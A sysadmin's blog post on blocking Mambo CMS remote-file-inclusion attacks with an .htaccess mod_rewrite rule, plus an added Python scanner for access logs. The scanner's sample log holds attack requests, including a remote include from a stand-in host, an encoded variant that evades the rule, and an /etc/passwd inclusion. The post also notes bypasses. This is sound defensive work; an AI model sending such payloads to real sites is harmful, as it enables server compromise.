ronny.haryan.to


Mambo mod_rewrite Security Hack

At work I manage several servers that mainly serve websites built on the Mambo content management system. I don’t follow Mambo development personally, but I know it has had several security vulnerabilities, one of which was pretty easy to exploit. To make matters worse, Mambo has a distinctive URL structure that makes Mambo sites trivial to find with a search engine. That combination attracts script kiddies from all over the world: I’ve seen several successful compromises where these idiots installed IRC DCC bots and ran spamming operations, with the attacks coming from Nigeria, Brazil, Indonesia (Jogja), Russia, Italy, and so on.

Sometimes the problem isn’t Mambo itself but poorly written third-party components whose authors don’t give a shit about security (why not just write a big “hack me” sign on the front page while you’re chmod 777-ing all your files?). As far as I know, Mambo has no built-in protection against poorly written third-party components. I’m by no means a Mambo expert, so I could be wrong, and please do correct me if I am.

I’ve had enough of these kiddie idiots running around thinking they’re cool hackers. The thing is, I don’t have time to investigate why Mambo, or whichever third-party component happened to be installed, is broken. Luckily there is a pattern in all of the incidents: every one of them exploits mosConfig_absolute_path remote file inclusion. The attacker supplies a URL in that variable, Mambo prepends it to the path of a file it includes, and PHP happily include()s/require()s the attacker’s script over HTTP. On many sites I could simply disable allow_url_include and/or allow_url_fopen in php.ini, but some sites need them, so that wasn’t an option everywhere. So I wrote a quick fix using Apache’s mod_rewrite and put it in a .htaccess file:

RewriteEngine On
# Match any request whose raw query string carries the mosConfig_absolute_path
# parameter; [NC] makes the match case-insensitive.
RewriteCond %{QUERY_STRING} mosConfig_absolute_path= [NC]
# Send the request to the front page. The trailing "?" replaces the original
# query string with an empty one; [R] is an external redirect (302 by default).
RewriteRule ^.*$ http://%{SERVER_NAME}/? [R]

This redirects every exploit attempt to the front page, so adjust it to your environment. You can shorten mosConfig_absolute_path= to just mosConfig if you want to be really anal. Two things to keep in mind: %{QUERY_STRING} is the raw, undecoded query string, so the condition only matches the parameter name spelled exactly that way (a URL-encoded variant, or the same variable injected through a POST body or cookie under register_globals, goes straight past it), and the rule does nothing about the underlying bug, so it is a band-aid rather than a fix. As I said, I’m not a Mambo expert, so I don’t know whether something like this can or should ship in the default .htaccess that comes with Mambo; people more familiar with Mambo can figure that out. In the meantime, this small hack should deter the kiddies.
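As an added example (my own code, not from the original post), here is a small Python scanner that pulls mosConfig_absolute_path injection attempts out of Apache access-log lines, URL-decodes the query string, separates remote includes from local values, and reports which attempts the raw-string RewriteCond above would actually have matched. The log lines, the IP addresses, the evil.example host and the com_foo component are all constructed for illustration.

```python
"""Scan Apache access-log lines for Mambo mosConfig_absolute_path injection attempts.

Added example, not part of the original post. The sample log lines below are
constructed for illustration; hosts, addresses and component names are made up.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+'
)

# Mambo's global config variable that the attacks overwrite via register_globals.
PARAM = "mosconfig_absolute_path"

# A value starting with a URL scheme means PHP would fetch and execute a remote script.
REMOTE_RE = re.compile(r"^(https?|ftps?)://", re.I)

# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    # classic remote-include attempt with the plain parameter name: the RewriteCond catches this
    '203.0.113.7 - - [12/Mar/2006:03:14:15 +1100] "GET /index.php?option=com_content'
    '&mosConfig_absolute_path=http://evil.example/c.txt? HTTP/1.1" 200 4213 "-" "libwww-perl/5.805"',
    # same attempt with percent-encoded underscores: slips past a raw-string RewriteCond
    '203.0.113.7 - - [12/Mar/2006:03:14:16 +1100] "GET /index.php?option=com_content'
    '&mosConfig%5Fabsolute%5Fpath=http://evil.example/c.txt? HTTP/1.1" 200 4213 "-" "libwww-perl/5.805"',
    # benign request
    '198.51.100.4 - - [12/Mar/2006:03:15:01 +1100] "GET /index.php?option=com_content'
    '&task=view&id=12 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    # parameter pointed at a local path instead of a URL (com_foo is a made-up component)
    '203.0.113.9 - - [12/Mar/2006:03:16:40 +1100] "GET /components/com_foo/foo.php'
    '?mosConfig_absolute_path=/etc/passwd%00 HTTP/1.1" 404 210 "-" "curl/7.15"',
]


def raw_rule_matches(query):
    """Mirror the post's RewriteCond: case-insensitive substring test on the raw query string."""
    return "mosconfig_absolute_path=" in query.lower()


def injected_value(query):
    """URL-decode the query string and return the mosConfig_absolute_path value, or None."""
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == PARAM:
            return value
    return None


def scan(lines):
    """Return one finding per log line whose query string carries the injected parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access-log line
        request = m.group("req").split()
        if len(request) < 2:
            continue  # malformed request line, e.g. "-" for a dropped connection
        target = urlsplit(request[1])
        value = injected_value(target.query)
        if value is None:
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "path": target.path,
            "injected": value,
            "remote": bool(REMOTE_RE.match(value)),
            "caught_by_rewrite": raw_rule_matches(target.query),
        })
    return findings


def missed_by_rewrite(lines):
    """Client IPs that sent an injection the raw-string RewriteCond would not have matched."""
    return sorted({f["ip"] for f in scan(lines) if not f["caught_by_rewrite"]})


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        kind = "remote include" if f["remote"] else "local value"
        status = "blocked by rewrite" if f["caught_by_rewrite"] else "NOT matched by rewrite"
        print(f'{f["ip"]} {f["path"]} -> {f["injected"]!r} ({kind}, {status})')
```

Run it against a real access log with `scan(open("access_log").read().splitlines())`; the `missed_by_rewrite` list is the set of clients you would want a decoded-query check (or a PHP-level guard) for, since the .htaccess rule above never sees them.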

Category: Security, Tips


About

Ronny Haryanto is a technology addict/chef wannabe living in beautiful Melbourne, Australia.
